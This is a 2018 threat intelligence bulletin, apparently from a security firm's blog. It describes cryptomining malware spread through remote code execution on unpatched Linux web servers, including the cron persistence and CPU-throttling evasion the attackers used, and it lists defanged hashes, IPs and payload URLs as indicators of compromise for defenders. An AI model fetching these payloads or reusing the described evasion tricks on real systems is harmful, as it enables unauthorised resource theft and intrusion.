Skip to main content

Intelligence Bulletin – When Cryptomining Attacks

February 07, 2018

Optiv has seen a continuation of attacks based off the usage of CryptoNight miner, in this case likely mining Monero cryptocurrency for the attackers. The attacks are focusing on Linux hosts that are running unpatched versions of Apache, JBoss and WebLogic. Attackers are exploiting Remote Code Execution exploits specific to the services in order to infect hosts with the mining malware. Infected hosts are configured to add a cronjob for download of the minerd ELF 64-bit executable and various configuration files for mining to the attacker’s wallet. Using this technique, the attacker can dynamically change the address and executables to avoid detection, or to migrate an attack upon detection.

intelligence-bulletin

Once downloaded, hosts are queried for available resources and workers are started based off CPU cores available. Recently, we have noticed that care has been taken to limit the resources used on the infected host in order to avoid detection. In a recent case, threads were only started on half of the available cores in order to not signal unusually high utilization on the machines. Also of note, the bash scripts utilized by the attackers are being disguised as typically non-executable files in order to avoid network detection when downloaded.

In order limit exposure to these threats we recommend that systems utilizing vulnerable services are patched in order to avoid the initial foothold. Additionally, file integrity monitoring and or HIDS should be reporting on crontab entries and modifications.

Optiv’s gTIC assesses with HIGH confidence that malicious actors will continue to utilize cryptomining malware in order to financially benefit. Additionally, we assess with HIGH confidence that malicious actors that are financially motivated will focus on targets of opportunity and are potentially utilizing tools such as Shodan to uncover vulnerable systems.

Intelligence Gaps:

  1. How will financially motivated actors continue to change TTPs for continued use of cryptomining malware?
  2. Is this an organized campaign to utilize cryptomining malware?
  3. How are malicious actors determining their targets?

A list of network IOCs for the miner binaries can be found below.

Hashes

  • 7153ac617df7aa6f911e361b1f0c8188ca5c142c6aaa8faa2a59b55e0b823c1c
  • 9359f7e7b1dd0f4ce4a2c52fe611c981a3dd7a17f935862e3ce9acb5f2df8ced
  • f4864b3793c93de50b953e9751dc22e03fa0333ae6856d8d153be9018da6d911
  • d47d2aa3c640e1563ba294a140ab3ccd22f987d5c5794c223ca8557b68c25e0d
  • bcf306bf3c905567ac1a5012be94fe642cac6116192cea6486730341b32b38a4
  • 0c5e960ca2a37cf383a7457bcc82e66d5b94164b12dfca1f21501211d9aca3c9
  • b3aba7582de82a0229b4d4caf73bc50cc18eb98109a0e251447dfb47afabc597
  • 0dc34402be603f563bfb25e7c476a0b4
  • 6455ffef458df6d24dd4df37f3d6df73
  • 9eadc40299864089e8a0959d04b02b39
  • e1df71c38cea61397e713d6e580e9051
  • deeb65dbf4ac5d1d0db6ac4467282f62049a3620
  • 777af085e72a4a19b6971f24c1167989335af508
  • 4f41da624726daf16e1c0034e8a6a99c790be61e
  • 9be68990dd7b071b192b89b0e384f290cce2b2db
  • 0b2bd245ce62787101bc56b1eeda9f74e0f87b72781c8f50a1eff185a2a98391
  • 182812097daabfc3fe52dd485bb0a0f566ddf47f23b9d9f72c2df01a1a4faf84
  • 43f78c1c1b078f29fd5eb75759aa7b1459aa3f1679bbaabc1e67c362620650fb
  • 370109b73fa9dceea9e2b34b466d0d2560025efcc78616387d84732cbe82b6bd
  • 36524172afa85a131bf0075c7ff20dcbfb8a94c4e981300fb33ef56ed912678c
  • 348c7dd59ea1b4e88585863dd788621f1101202d32df67eb0015761d25946420
  • 198e090e86863fb5015e380dc159c5634cc2a598e93b20dd9695e1649bb062ad
  • d47d2aa3c640e1563ba294a140ab3ccd22f987d5c5794c223ca8557b68c25e0d
  • f4864b3793c93de50b953e9751dc22e03fa0333ae6856d8d153be9018da6d911
  • 3b83c25a00b3820b28941d4be1583af8ed22ca20a8270c318d02e4918d7b3070

IPs

  • 104[.]25[.]208[.]15
  • 94[.]130[.]143[.]162
  • 72[.]11[.]140[.]178
  • 88[.]99[.]142[.]163
  • 78[.]46[.]91[.]134
  • 104[.]25[.]209[.]15
  • 136[.]243[.]102[.]154
  • 136[.]243[.]102[.]167
  • 148[.]251[.]133[.]246
  • 104[.]223[.]37[.]150
  • 208[.]92[.]90[.]51
  • 45[.]77[.]106[.]29
  • 181[.]214[.]87[.]240
  • 181[.]214[.]87[.]241

Domains

  • hxxp://27[.]148[.]157[.]89:8899/1[.]exe
  • hxxp://221[.]229[.]204[.]177:8888
  • hxxp://27[.]148[.]157[.]89:8899/xmrig
  • hxxp://72[.]11[.]140[.]178/?info=l30
  • hxxp://72[.]11[.]140[.]178/files/
  • hxxp://72[.]11[.]140[.]178/?info=l69
  • hxxp://72[.]11[.]140[.]178/files/w/default
  • hxxp://27[.]148[.]157[.]89:8899/xmr64[.]exe
  • hxxp://72[.]11[.]140[.]178/?info=w0
  • hxxp://27[.]148[.]157[.]89:8899/1[.]sh
  • hxxp://72[.]11[.]140[.]178/files/w/default/auto-upgrade[.]exe
  • hxxp://72[.]11[.]140[.]178/files/w/default?info=w0
  • hxxp://www[.]luoxkexp[.]com:8520/php[.]exe
  • hxxp://72[.]11[.]140[.]178/auto-upgrade
  • hxxp://luoxkexp[.]com:8888/samba[.]exe
  • hxxp://27[.]148[.]157[.]89:8899/xmr86[.]exe
  • hxxp://27[.]148[.]157[.]89:8899/fuckpig[.]jar
  • hxxp://www[.]luoxkexp[.]com:8520/
  • hxxp://72[.]11[.]140[.]178/?info=w9
  • hxxp://72[.]11[.]140[.]178/files/w/default?info=w9
  • hxxp://luoxkexp[.]com:8888/xmr64[.]exe
  • hxxp://luoxkexp[.]com/xmr64[.]exe
  • hxxp://27[.]148[.]157[.]89:8899/112[.]exe
  • hxxp://72[.]11[.]140[.]178/files
  • hxxp://27[.]148[.]157[.]89:8899/jiba
  • hxxp://luoxkexp[.]com
  • hxxp://72[.]11[.]140[.]178/files/w/others
  • hxxp://72[.]11[.]140[.]178/setup-watch
  • hxxp://72[.]11[.]140[.]178/wls-wsat/CoordinatorPortType
  • hxxp://72[.]11[.]140[.]178/?info=l60
  • hxxp://72[.]11[.]140[.]178/files/l/default
  • hxxp://luoxkexp[.]com:8888/xmr86[.]exe
  • hxxp://luoxkexp[.]com:8899/xmr64[.]exe
  • hxxp://72[.]11[.]140[.]178/files/l/others
  • hxxp://luoxkexp[.]com:8899/1[.]exe
  • hxxp://letoscribe[.]ru/includes/libraries/files[.]tar[.]gz
  • hxxp://letoscribe[.]ru/includes/libraries/getsetup[.]php?p=wl
  • hxxp://45[.]77[.]106[.]29/selectv2[.]sh
  • hxxp://45[.]77[.]106[.]29/sourplum
  • hxxp://45[.]77[.]106[.]29/lowerv2[.]sh
  • hxxp://45[.]77[.]106[.]29/rootv2[.]sh
  • hxxp://181[.]214[.]87[.]240/res/logo[.]jp
  • hxxp://5[.]188[.]87[.]12/langs/kworker_na
  • hxxp://181[.]214[.]87[.]240/res/kworker[.]conf
  • hxxp://letoscribe[.]ru/includes/libraries/notify[.]php?p=wl
  • hxxp://104[.]223[.]37[.]150:8090
  • hxxp://k[.]zsw8[.]cc:8080
  • hxxp://i[.]zsw8[.]cc:8080
  • hxxp://pastebin[.]com/raw/rWjyEGDq
  • hxxp://208[.]92[.]90[.]51
  • hxxp://208[.]92[.]90[.]51:443
  • minergate[.]com
  • minexmr[.]com
  • letoscribe[.]ru
  • pool-proxy[.]com
  • fee[.]xmrig[.]com
  • nicehash[.]com
  • data[.]rel[.]ro
  • dkuug[.]dk
  • i[.]zsw8[.]cc
  • k[.]zsw8[.]cc
  • pool[.]supportxmr[.]com
  • pool[.]cortins[.]tk

 

Sources

Related Blogs

September 25, 2014

"Shellshock" Vulnerability in Bash Allows Unauthorized, Remote Code Execution

On September 24, a critical vulnerability - CVE-2014-6271 - was made public. This vulnerability, dubbed “Shellshock,” exposes a weakness in which cert...

See Details

March 22, 2018

Intelligence Bulletin – MinionGhost Reemerges

At approximately 9:30am EDT on 20 March 2018, hacktivist collective, MinionGhost, announced planned cyber attacks against unspecified Asian entities. ...

See Details

April 29, 2013

Intelligence Preparation of the Battlefield: What is Your Footprint?

Intelligence is defined as the gathering of information or raw data that has been analyzed for its validity and usefulness. One of the first exercises...

See Details

How Can We Help?

Let us know what you need, and we will have an Optiv professional contact you shortly.


Privacy Policy

Related Insights

July 29, 2016

2016 Cyber Threat Intelligence

Learn how Optiv’s cyber threat intelligence solution helps clients improve their threat response approach.

See Details

April 09, 2014

The Evolution of Malware and Security Compromise

Malware is evolving and changing at an unprecedented rate. The fact is that 95% of all organizations have been compromised, without their knowledge, i...

See Details

January 21, 2015

Cyber Security Public Policy

Imagine a scenario where a highly motivated, trained, and well equipped enemy launched an invasion against the United States. Upon arriving at our sho...

See Details

Stay in the Know

For all the latest cybersecurity and Optiv news, subscribe to our blog and connect with us on Social.

Subscribe

Join our Email List

We take your privacy seriously and promise never to share your email with anyone.

Stay Connected

Find cyber security Events in your area.